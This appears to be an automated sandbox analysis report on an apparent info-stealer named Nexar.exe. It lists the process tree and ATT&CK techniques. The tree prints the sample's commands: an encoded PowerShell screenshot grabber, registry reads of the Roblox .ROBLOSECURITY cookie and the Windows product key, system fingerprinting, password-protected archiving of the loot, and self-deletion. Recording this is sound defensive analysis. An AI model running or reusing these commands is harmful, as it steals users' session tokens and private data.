    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:2720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4592
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cwqcbj0t\cwqcbj0t.cmdline"
        5⤵
        
        PID:548
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82BD.tmp" "c:\Users\Admin\AppData\Local\Temp\cwqcbj0t\CSC249D26D4459C45A3B0F4373D7B9F8A7.TMP"
        6⤵
        
        PID:1852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2136
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1364
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:788
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1968
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1932
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4200
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:736
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3460
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3156
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\A0WiC.zip" *"
    3⤵
    PID:788
  - - C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\A0WiC.zip" *
      4⤵
      Executes dropped EXE
      PID:3984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2696
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3376
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1560
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Nexar.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4812
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8d37fcc40,0x7ff8d37fcc4c,0x7ff8d37fcc58
  2⤵
  PID:3556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1836,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1840 /prefetch:2
  2⤵
  PID:608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1884,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1896 /prefetch:3
  2⤵
  PID:4028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2224 /prefetch:8
  2⤵
  PID:4472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3200 /prefetch:1
  2⤵
  PID:1740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3432 /prefetch:1
  2⤵
  PID:1596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3124,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4408 /prefetch:1
  2⤵
  PID:1632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4544,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4644 /prefetch:8
  2⤵
  PID:2500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4640,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:8
  2⤵
  PID:460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4608,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4900 /prefetch:8
  2⤵
  PID:3928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4900,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4920 /prefetch:8
  2⤵
  PID:2964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4664,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4656 /prefetch:8
  2⤵
  PID:5100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4912 /prefetch:8
  2⤵
  PID:3140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4964 /prefetch:8
  2⤵
  PID:1712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5108,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4744 /prefetch:8
  2⤵
  PID:1572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4920,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4716 /prefetch:2
  2⤵
  PID:548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5136,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:1
  2⤵
  PID:3948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5048,i,17978258192732904401,11746462385431436364,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2320

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1716

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

